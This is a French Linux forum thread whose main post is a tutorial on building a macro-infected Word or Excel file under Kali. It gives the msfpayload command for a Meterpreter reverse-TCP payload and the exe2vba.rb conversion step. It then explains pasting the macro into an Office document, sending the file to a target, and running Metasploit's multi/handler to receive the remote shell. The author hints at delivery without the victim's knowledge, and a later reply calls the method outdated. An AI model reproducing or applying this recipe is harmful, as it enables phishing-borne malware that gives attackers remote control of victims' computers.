user@linuxtrack:~ $ python -c 'print("Soyez les bienvenus !")'
Vous n'êtes pas identifié(e).
- Contributions : Récentes | Sans réponse
#1 15-02-2014 12:02:52
- IceF0x
- #! Gourou Linux
[Tuto]Créer un fichier Office infecté avec un payload sous Kali 1.0.6
Étape 1: Créer votre propre payload
Voici un exemples à vous d'adapter..
msfpayload windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=443 X > /tmp/payload.exeÉtape 2: Convertissez votre payload créé en VBA (Visual Basic for Application) script
Déplacez vous dans le répertoire contenant l'outil de conversion de votre payload.
cd /usr/share/metasploit-framework/tools/Et utilisez le script exe2vba.rb pour convertir votre payload.
./exe2vba.rb /tmp/payload.exe /tmp/payload.vba
Étape 3: copiez et collez le contenu de votre payload dans votre fichier Office.
Le fichier se compose de 2 partie:
La partie Visual Basic se copie dans la macro.
Les données. la partie hexadécimal doit être ajouté à la fin du contenu du document.
Voici l'aide pour office 2010:
http://office.microsoft.com/fr-be/word- … 99769.aspx
http://office.microsoft.com/fr-be/excel … 14112.aspx
Ouvrez votre fichier à infecter (Excel ou Word), sélectionner: Outils>Macro>Visual Basic Editor, collez le contenu de votre payload.vba, puis enregistrez le fichier.
Étape 4: Envoyez le fichier infecté à votre client.
Là comme il s'agit d'un test j'ai simplement copié collé avec une clé USB le fichier sur mon PC test, pour les transferts à l'insu d'une victime potentielle c'est pas sur ce forum.
Étape 5: Attendez que la connexion avec le client s'établisse.
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST <IP>
msf > set LPORT 443
msf > exploitUtiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
Hors ligne
#2 21-10-2023 14:22:50
- wemosd1
- Membre
Re : [Tuto]Créer un fichier Office infecté avec un payload sous Kali 1.0.6
Est ce encore d'actualité?
Hors ligne
#3 23-11-2023 06:49:34
- IceF0x
- #! Gourou Linux
Re : [Tuto]Créer un fichier Office infecté avec un payload sous Kali 1.0.6
Est ce encore d'actualité?
depuis 2014 non évidemment.
Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
Hors ligne